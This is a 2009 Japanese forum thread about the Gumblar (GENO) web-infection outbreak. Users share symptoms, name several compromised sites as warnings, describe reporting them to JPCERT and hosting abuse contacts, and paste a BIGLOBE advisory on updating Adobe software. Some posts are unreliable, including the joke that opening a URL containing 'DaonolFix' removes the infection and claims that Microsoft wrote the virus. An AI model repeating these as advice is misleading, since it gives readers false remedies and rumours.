599:名無しさん@お腹いっぱい。
09/05/24 20:40:27
ふくぜんブログのコメントが賑わって来た
600:名無しさん@お腹いっぱい。
09/05/24 20:43:59
>>593
GENOっぽいね
martuzcnが見えた
601:名無しさん@お腹いっぱい。
09/05/24 20:47:41
中古PCとか勘弁だなあ
パーツの交換ができるデスクトップならまだしも
換えの効かないパーツが多いノートではファンが劣化してたりとか考えるとなー
修理に出す手間や費用考えたら新品の方が格段に良い
602:名無しさん@お腹いっぱい。
09/05/24 20:49:12
最近は、新品のUSBメモリ挿しただけで感染って事例もあるからな
603:名無しさん@お腹いっぱい。
09/05/24 20:52:39
>>602
USBメモリ刺しただけで自動実行とか馬鹿にも程がある仕組み考えた奴は今頃何してんのかな・・・
604:名無しさん@お腹いっぱい。
09/05/24 20:52:50
スマン言葉足りんかった;
ウイルスセキュリティソフトの間違い
新規HDDまでは資金的に厳しいから、とりあえず仕込まれてなければ壊れるまで頑張るつもり
605:名無しさん@お腹いっぱい。
09/05/24 20:54:26
GENOコナーズ
606:名無しさん@お腹いっぱい。
09/05/24 20:59:15
仕込まれてるのが判らないように巧妙に潜伏して情報を抜き取るのが今時のウイルスです
利用者を脅かしたり嫌がらせが主な目的の昔のウイルスみたいに
素人にも存在をアピールしまくるのは今ではもう稀だろ
607:名無しさん@お腹いっぱい。
09/05/24 21:09:17
アピールしまくったせいでこうなった
608:名無しさん@お腹いっぱい。
09/05/24 21:14:04
子供のころに世界不思議発見かなんかで見たコンピュータウィルス特集に
画面にパックマンが現れてデータ消してくとかあったなw
子供のころはすげーって思ったが今にして思えば製作者は何がしたかったのかと
609:名無しさん@お腹いっぱい。
09/05/24 21:15:54
avastで確認したらマルウェアが検出されましたって出たんですけれども
クリーンインストールですか
610:名無しさん@お腹いっぱい。
09/05/24 21:17:34
乙
611:名無しさん@お腹いっぱい。
09/05/24 21:24:59
>>608
たぶんパックマンがトラウマンになる
612:名無しさん@お腹いっぱい。
09/05/24 21:27:49
精神的にやられてるならクリーンインストールしたほうが心の為になると思わない?
613: ◆f/iQdjPxCM
09/05/24 21:34:28
>>580
> ネ板で変なexe作ってた人たちがいたけど
誰も駆除には手を着けてないはず。
「駆除」を名乗れるほど入手・解析の両面で網羅した人は居ないだろうしね。
>>28,>>142
当初から
URLリンク(www.symantec.com)
> また、次の文字列を含むプロセスが実行されるのを阻止します。
> .com
> .bat
> .reg
> cmd
> reged
が無かったならば、ベストな手法だったかも。
これが故に汎用性が落ちるのが惜しいところ。
今回のzlkon系という括りに対してはともかく、
将来の他のdrivers32起点型malwareで阻止されない場合には有用だろうね。
614:名無しさん@お腹いっぱい。
09/05/24 21:41:27
都会では 感染する 若者が 増えている
今朝きた 新聞の 片隅に 書いていた
だけども 問題は インフルエンザ マスクがない
615:名無しさん@お腹いっぱい。
09/05/24 21:43:52
>>588
悪いことしているというより悪い事をしたんだけどな
616:名無しさん@お腹いっぱい。
09/05/24 21:43:56
>>614
悲しい歌はやめろおおおおおおおおお
617:名無しさん@お腹いっぱい。
09/05/24 21:48:43
>>613
なんで.batと.cmdだけ阻止なんだろ。次の亜種はVBScriptでもひっさげてくるのか?
618:名無しさん@お腹いっぱい。
09/05/24 22:19:23
さっきabode使ってたら 調査の協力をお願いします見たいのが出てきて
それを承諾してしばらくしたら突然Windowsに必要なファイルが見つかりません見たいな警告が出てきた
気になってcmdやってみたら見つかりません sqlsodbcもファイル自体発見できず
再起動してみたら必要なファイルがない為起動できませんってなった
ノートンのおかげで復帰できたけど GENOと関係あるのかな・・・ ないにしろビックリした
619:名無しさん@お腹いっぱい。
09/05/24 22:20:22
>>618
おちつけ
それと環境と前後の状況をかくんだ
620:名無しさん@お腹いっぱい。
09/05/24 22:22:37
騒ぎすぎ
不安を煽り立てるのが上手な方たちですね。
621:名無しさん@お腹いっぱい。
09/05/24 22:24:13
DaonolFix を含むURL作って踏めば駆除できるやん
622:名無しさん@お腹いっぱい。
09/05/24 22:25:51
つーことはこれ踏めばおk?
URLリンク(pc11.2ch.net)
623:名無しさん@お腹いっぱい。
09/05/24 22:29:35
感染したサイトが一時閉鎖すればいいだけだろ
ばらまくなよ
624:名無しさん@お腹いっぱい。
09/05/24 22:30:17
>>614
井上さん乙
625:名無しさん@お腹いっぱい。
09/05/24 22:33:56
一番古い感染報告は、いつ頃?
オレはsqlsodbc.chmが書き換えられた日付が3月21日だったけど
626:名無しさん@お腹いっぱい。
09/05/24 22:37:51
亜種はcmd.exe起動するってほんと?
627:名無しさん@お腹いっぱい。
09/05/24 22:43:22
「ふくぜん」はなんだかんだで対処したのでエライですね。
以下、完全放置を決込んでるツワモノ。。。
*感染注意*
www.ti-a-ra.com
www1.odn.ne.jp/revue1999
www.k-q-bury.com
628:名無しさん@お腹いっぱい。
09/05/24 22:44:55
>>625
日付についてはどうとでもなるのでサイズで確認推奨
>>626
起動したのもあったとおもう
不完全だったのか亜種だったのか不明
629:名無しさん@お腹いっぱい。
09/05/24 22:51:16
パソコンなんて使わなきゃいいんだよ
電話とファクシミリで十分
630:名無しさん@お腹いっぱい。
09/05/24 22:52:21
>>629
なにそれこわい
631:名無しさん@お腹いっぱい。
09/05/24 22:53:35
>>627
感染率1000%・・・
今のところあるセキュリティソフトの中で一番対応がしっかりしてて
ウイルスの駆除や情報、解析がしっかりしてるのってどれなんだ・・・
632:名無しさん@お腹いっぱい。
09/05/24 22:56:20
>>620
この板も強制ID導入したほうがいいかもな。
633:名無しさん@お腹いっぱい。
09/05/24 23:02:42
>>631
騒ぎがあるたびに乗り換えてたらキリがないよ
ある程度のソフトが対応できてきてるし
いま使ってるやつが期限切れてないならそれでおk
セキュリティソフトを過信するよりも他の対策方法があるんだから
そういうのをしっかりやりましょう
Genoに限らずOSや各種ソフトの更新はセキュリティ対策として基本的なことだよ
Geno対策についてはスレの上のほうも見てね
634:名無しさん@お腹いっぱい。
09/05/24 23:04:03
ID導入で廃れるな
間違いない
635:名無しさん@お腹いっぱい。
09/05/24 23:06:33
自作自演はある程度難しくなりますねw
636:名無しさん@お腹いっぱい。
09/05/24 23:15:16
URLリンク(www.gred.jp)
gred(グレッド)は、株式会社セキュアブレイン
(URLリンク(www.securebrain.co.jp))が開発し、運営しています。
早く対応しないと会社の信用が落ちるのに、どうなってるんだろ?
gred開発チームのブログ
URLリンク(info.gred.jp)
637:名無しさん@お腹いっぱい。
09/05/24 23:21:04
フシアナすればID見れるんだな
638:名無しさん@お腹いっぱい。
09/05/24 23:52:58
>>627
2番目は放置決め込んでる管理者よりODNに消させたほうが早いだろ
639:名無しさん@お腹いっぱい。
09/05/24 23:58:52
>>627
JPCERT/CCへ連絡しました
640:名無しさん@お腹いっぱい。
09/05/25 00:19:45
>>627
一番上:5/16にメール済み。開封確認届いていない。サーバー業者abuse行きかな。
二番目:5/16にメールしたのが読まれていない模様。サーバー業者のabuseに投げとくわ。
三番目:5/21にメール 15:15に、HP管理会社に問い合わせ中との返答あり。対応中。(多分、週明けに動く?)
641:名無しさん@お腹いっぱい。
09/05/25 00:34:38
>>640
「サロン情報リスト」の中の人とは別の方ですね?
お疲れ様です。
genolists.alink.uic.to
こちらもまだまだ放置多いみたいですね。
642:名無しさん@お腹いっぱい。
09/05/25 00:37:55
>>641
はいの、別人です。リストに載ってるものはあらかたチェックしてメールした…筈。
>627の上2件、サーバー業者abuse または 技術管理担当者 宛に報告完了。
643:名無しさん@お腹いっぱい。
09/05/25 01:45:45
ふくぜんに返答コメントがついてた
644:名無しさん@お腹いっぱい。
09/05/25 01:55:52
スレリンク(news板:176番)
これは?
645:名無しさん@お腹いっぱい。
09/05/25 02:02:13
>>644
ニコニコの偽者っぽいやつは中国のマルウェア配布サイト
646:名無しさん@お腹いっぱい。
09/05/25 02:38:52
jpgの女は殺られたね
かわいそうに
647:名無しさん@お腹いっぱい。
09/05/25 03:22:45
寝るか
648:名無しさん@お腹いっぱい。
09/05/25 03:48:43
>>613
よく考えたらその通りだな
まあ安心したいならregコマンド実行してみてくれつーことで
DaonolFix落として実行したほうが分かりやすくて早いんだけどな
649:名無しさん@お腹いっぱい。
09/05/25 10:04:25
これMSが作ったんじゃねーか?Vista売るために。
650:名無しさん@お腹いっぱい。
09/05/25 10:05:51
これM$が作ったんじゃねーか?7売るために。
651:名無しさん@お腹いっぱい。
09/05/25 10:09:10
>>627
ふくぜんは直ってないぞ
652:名無しさん@お腹いっぱい。
09/05/25 10:19:58
いや直ってるだろ
サイトマップから全てのページのソース見たけど怪しい記述はなかった
jsの中も改ざんされてないし
googleに頼る前にソース見ろよ
653:名無しさん@お腹いっぱい。
09/05/25 10:41:46
ここってどうなんですか?
クロームじゃ真っ赤な画面になります。
URLリンク(page15.auctions.yahoo.co.jp)
もし感染しているとしたら、すでにヤフオクにも蔓延?
654:名無しさん@お腹いっぱい。
09/05/25 10:53:27
ヤフオク自体は感染してないけど
GUITAR CRAFT(guitarcraft.jp)ってサイトが感染しててそれをgoogleが危険と判断
>>653ではそのguitarcraft.jpから画像を読み込もうとしてるから「大丈夫?怪しくない?」ってchromeが警告出してる状態
>>653自体は踏んでも問題ないけどリンク先は保証しないよ
655:名無しさん@お腹いっぱい。
09/05/25 10:55:00
コロンブスへは誰か連絡したの?まだ直ってないよ。
656:名無しさん@お腹いっぱい。
09/05/25 11:00:03
ちょっと時間かかるよ
657:名無しさん@お腹いっぱい。
09/05/25 11:00:51
>>649
ありうる
作って得する奴が作ったんだろうね
658:名無しさん@お腹いっぱい。
09/05/25 11:01:11
>>634
ありがとうございます。
659:名無しさん@お腹いっぱい。
09/05/25 12:17:01
【Gumblar (通称 GENOウイルス)】にご注意を
ベクターPCショップ??対策別セキュリティソフトの選び方
URLリンク(shop.vector.co.jp)
現在、「Gumblar」(GENOウイルス、JSRedir-Rとも表記)が急速に蔓延しています。
これはFlashやPDFビューアのプラグインの脆弱性をついて感染する新種の「トロイの木馬」です。
Webサイトを参照しただけで感染する悪質なウイルスのため、一般のユーザーでも警戒が必要です。
また、サイト管理者の方のパソコンがこのウイルスに感染すると、入手したパスワードからサイトを改変します。
このサイトにアクセスすると、別サイトからウイルスやスパイウェアなどをダウンロードさせます。
■感染した場合の影響
・sqlsodbc.chmを改変
・レジストリエディタ、コマンドプロンプトが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(WindowsUpdate、ウイルス対策ソフト関連サイトなど)
・ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄
・explorer.exeや一部のブラウザが異常終了
・PDFファイルやシステムファイルが増殖
・パソコンの動作が重くなる
詳細な情報は、各ウイルス対策ソフトメーカーのWebサイト等でご確認ください。
660:名無しさん@お腹いっぱい。
09/05/25 12:21:28
BIGLOBEからメール来てて驚いた
ちゃんと対策とれよと書いてた
661:名無しさん@お腹いっぱい。
09/05/25 12:28:39
sqlsodbc.chmを改変されてないけどGENOっぽいのにやられた
Windowsと一緒にヘルプファイルの大量起動&肥大化
今スキャン中っていうかOneCare仕事しろ
662:名無しさん@お腹いっぱい。
09/05/25 12:31:27
亜種?
663:名無しさん@お腹いっぱい。
09/05/25 12:54:52
それ、ただのブラクラなんじゃ?
664:名無しさん@お腹いっぱい。
09/05/25 13:01:08
>>663
いや起動と同時にヘルプファイルがガンガン開き始めて400くらいまでいったんだが
ブラクラで通常終了後、起動と同時に仕掛ける時限式なんてあるのかな
ブラウジングなんてJaneで2ちゃんしか開いて無いぞ
あとGENOチェッカーで昨晩踏んだ疑わしいサイト(エロ同人系)
かけてもせいぜい危険度34%程度だった
665:名無しさん@お腹いっぱい。
09/05/25 13:10:31
>>660
こぴぺよろ
メルアドとか名前とかは消していいから
666:名無しさん@お腹いっぱい。
09/05/25 13:10:53
どれ?
667:名無しさん@お腹いっぱい。
09/05/25 13:15:15
>>664
> ブラウジングなんてJaneで2ちゃんしか開いて無いぞ
> あとGENOチェッカーで昨晩踏んだ疑わしいサイト(エロ同人系)
矛盾してね?
チェッカーで見ただけなのかブラウザで見たのかどっちですか?
それ以外もエロサイト行ってるならそのへんが原因だとおもう
668:名無しさん@お腹いっぱい。
09/05/25 13:23:34
>>667
ああごめんちょっと書き方がまずかったね
昨晩エロ同人系一ヶ所だけ見て何事も無く終了
けさPC起動してJane立ち上げてるとヘルプファイル大量起動に気付く
とりあえずタスクマネージャで一掃
もしやと思いそのエロ同人サイトをチェッカーにかけてもはっきりとした判定は出ず
ってこと、同人系は本当にそこしか行って無いし
さっきから履歴見て他一般系も調べてるけど今のとこ反応出ない
669:名無しさん@お腹いっぱい。
09/05/25 13:26:56
先ずそのリンクを晴
670:名無しさん@お腹いっぱい。
09/05/25 13:30:17
え、自分もjane大量に立ち上がることあるがウイルスなのか?
単なるバグかと思ってたが
671:名無しさん@お腹いっぱい。
09/05/25 13:31:06
あいよ、ここしか行ってないのは確か
http:■■samurai3.net■
しかしID無いと不便だな
672:名無しさん@お腹いっぱい。
09/05/25 14:42:33
>>665
BIGLOBEの会員全員に送られてるメールだよ
内容はたしかアドビ製品の更新とウィルス対策ソフトを入れろってやつ
673:名無しさん@お腹いっぱい。
09/05/25 14:48:42
>>671
すくなくとも、現時点ではGENO呼び出しは入ってないようだ。
674:名無しさん@お腹いっぱい。
09/05/25 14:49:47
adobeとMSにまず呼び出しするべきだな GENO呼んでも対策にならん
675:名無しさん@お腹いっぱい。
09/05/25 14:51:06
えっ?
676:名無しさん@お腹いっぱい。
09/05/25 14:51:09
>>668
二行目ではさも1サイトしか閲覧してないようなことをいってるのに
最後の行では他も行ってそうなことをほのめかしてるんだが
何でそんなに情報隠蔽して小出しなの?
Geno感染は同人系サイトだけじゃないよ
あとチェッカーじゃなくてソース見てくれ
>>671は問題なさそう
スキャン結果も出たらkwsk
677:名無しさん@お腹いっぱい。
09/05/25 14:52:33
>>668
HELPファイルの大量起動:少なくともGENOではない。
なにかのファイルを多数開いてPCをクラッシュさせるブラクラは、マルウェア(ウイルス)ちゃいます。
もっかいPC再起動して、同じ症状が出るか確認。スタートアップに変なものいないか確認。
678:名無しさん@お腹いっぱい。
09/05/25 14:55:00
チェッカーは凄く役立つけど過信しすぎるのは...
679:名無しさん@お腹いっぱい。
09/05/25 14:56:21
>>5
アフィチェッカー
680:名無しさん@お腹いっぱい。
09/05/25 14:58:06
余計なこと言うな
適当にほめとけ
681:名無しさん@お腹いっぱい。
09/05/25 15:02:28
チェッカーの人、定期的にν速で適当なGENOスレ建てて宣伝してるね
682:名無しさん@お腹いっぱい。
09/05/25 15:03:54
アフィで必死なんだろう。生暖かく見守ってやろうぜ。自分に影響ない箇所でやってる分には。
683:名無しさん@お腹いっぱい。
09/05/25 15:04:47
>>681
そういうこと書くと「セキュ板の民度が~」「レベル低い」
って言い出すからやめとけ
684:名無しさん@お腹いっぱい。
09/05/25 15:06:44
うちも
他板で聞いてもバカとかいわれたし
知らないくせにでしゃばんじゃねーよって感じ
しょせんキモヲタ(笑)
685:名無しさん@お腹いっぱい。
09/05/25 15:11:12
GENOチェッカーについて都合の悪い書き込みがある。
↓
「セキュリティ板はレベルが低い。有用な情報書き込むつもりだったけどやめました。」と
他の板のスレに書き込み始める。
686:名無しさん@お腹いっぱい。
09/05/25 15:15:49
アンチの自演が始まったってレスがつくぞ
687:名無しさん@お腹いっぱい。
09/05/25 15:19:56
あの人の話題はやめてくれ
空気悪くなるから
688:名無しさん@お腹いっぱい。
09/05/25 15:22:16
アフィのやつはageるからわかりやすかったのにな
黙ってりゃよかったのに
689:名無しさん@お腹いっぱい。
09/05/25 15:26:44
誤認定ハ消ソウト思エバ一瞬デ消セマスヨ。
万ガ一亜種ガ出タ時ノコトヲ考エテ、余剰処理ヲ残シテアルンデス。
ゴリゴリ大好キサンナラ、ソースヲ読ミ込マセテ外部JSノURLヲ出力スルヤツクラハイ
690:名無しさん@お腹いっぱい。
09/05/25 15:26:49
アフィ野郎も死ね
691:名無しさん@お腹いっぱい。
09/05/25 15:27:05
ageなくても文体でわかるが
692:名無しさん@お腹いっぱい。
09/05/25 15:28:20
あたしのためにケンカするのはやめて!
693:名無しさん@お腹いっぱい。
09/05/25 15:29:39
じゃあ、あしたのためにケンカする!
694:名無しさん@お腹いっぱい。
09/05/25 15:30:25
かっこつけやがって・・・
695:名無しさん@お腹いっぱい。
09/05/25 15:30:46
これでいいんだ……これで
696:名無しさん@お腹いっぱい。
09/05/25 15:34:35
アフィ、チェッカーをNG登録完了
荒らすなよ
697:名無しさん@お腹いっぱい。
09/05/25 15:37:26
/ ̄ ̄ ヽ,
喧嘩をやめゅてぇ~♪ / 丶 / ',
ノ//, {゚} /¨`ヽ {゚} ,ミヽ
アンチをとゅめてぇ~♪ / く l ヽ._.イl , ゝ \
.ni 7 / /⌒ リ ヘ_/ノ ' ⌒\ \
l^l | | l ,/) (  ̄ ̄⌒ ⌒ ̄ _)
', U ! レ' / / ̄ ̄ ヽ, ` ̄ ̄`ヽ /´ ̄
/ 〈 / ', .n .| ・ ・ |
ヽっ{゚} /¨`ヽ {゚}, l^l.| | /)ノ |
/´ ̄ ̄ .l ヽ._.イl ', | U レ'//) ノ
/ ィ-r--ノ ヘ_/ノ ', ノ / ∠_
,/ ヽ rニ | f\ ノ  ̄`丶.
丿' ヽ、 `ヽ l | ヽ__ノー─-- 、_ )
. !/ ヽ、 | | | / /
/ !jl |ノ ,' /
.l l | | ,'
.| ・ 丶 ヽ | /
! ア!、, | | ,ノ 〈
./ ・ ./' ( ヽ_____ノ ヽ.__ \
/ ヽ._> \__)
698:名無しさん@お腹いっぱい。
09/05/25 15:38:22
>>665
貼ろうと思ったけど本文長すぎっていわれたー
699:名無しさん@お腹いっぱい。
09/05/25 15:40:32
分けて貼るの面倒くさいしー
700:名無しさん@お腹いっぱい。
09/05/25 15:41:01
>>698
画像でうpしてみるのは?
キャプったあとに名前とか修正してうp
701:名無しさん@お腹いっぱい。
09/05/25 15:42:25
テキストも画像もうpは面倒くさいー
702:名無しさん@お腹いっぱい。
09/05/25 15:44:22
また荒らしが来てる気がする
703:名無しさん@お腹いっぱい。
09/05/25 15:52:05
「【重要】ホームページ改ざん防止のため今すぐ対策をお願いします」って件名のメールだったら来たけど。
それの話?5月22日に送られてきた。
>>672も書いてる通り。そしてFTPのパスワードは定期的に変更して下さいっていうことも書いてある。
704:名無しさん@お腹いっぱい。
09/05/25 15:53:22
もう感染してたらパスワード変えたって意味ないよな
705:名無しさん@お腹いっぱい。
09/05/25 15:54:35
2009年5月22日
BIGLOBE個人ホームページを
ご利用のみなさま
NECビッグローブ株式会社
BIGLOBEカスタマーサポート
━━━━━━━━━━━━━━━━━━
【重要】ホームページ改ざん防止のため今すぐ対策をお願いします
━━━━━━━━━━━━━━━━━━
※このメールは大切なお知らせのため、5月20日現在BIGLOBE個人ホームページ
を契約中のお客様全員にお送りしています。
平素より弊社のBIGLOBEサービスをご利用いただき、誠にありがとうござい
ます。
現在、ウイルス感染によりホームページが改ざんされる事例が多数報告され
ています。
この改ざんされたホームページを閲覧するだけで、パソコンがウイルスに感
染する可能性があります。
感染は、パソコンにあるAdobe ReaderやAdobe Acrobat、Adobe Flashの脆弱
(ぜいじゃく)性を利用して行われます。
ウイルスに感染すると、お客様が個人ホームページをアップロードする際に
用いるFTPアカウントおよびFTPパスワードが盗まれた上に、お客様のホーム
ページが改ざんされてしまう可能性があります。
お客様の大切なホームページが感染被害にあったり、感染および改ざんに
よってお客様ご自身が感染の加害者となったりする可能性を低くするため
に以下の対策をすぐに行ってください。
706:名無しさん@お腹いっぱい。
09/05/25 15:55:38
---------------------------------------------------------------------
◆ウイルス感染する可能性のあるシステム
---------------------------------------------------------------------
- Adobe Reader/Acrobat 9.1 およびそれ以前のバージョン
- Adobe Flash Player 10.0.12.36 およびそれ以前のバージョン
---------------------------------------------------------------------
◆対策
---------------------------------------------------------------------
1.Adobe製品を最新版にアップデートする
1-1. Adobe Reader および Acrobat を最新版(9.1.1以降)にアップ
デートする
■最新バージョンのAdobe Readerのダウンロード
URLリンク(get.adobe.com)
※上記インストール後、Adobe Reader を起動して
「ヘルプ」→「アップデートの有無をチェック」を選び、
最新版(9.1.1)にアップデートしてください。
なお、新規インストール時は9.1版であり、最新版ではない
のでご注意ください(2009年5月20日時点)。
1-2. Adobe Flash Player を最新版にアップデートする
■Adobe Flash Playerのインストール
URLリンク(get.adobe.com)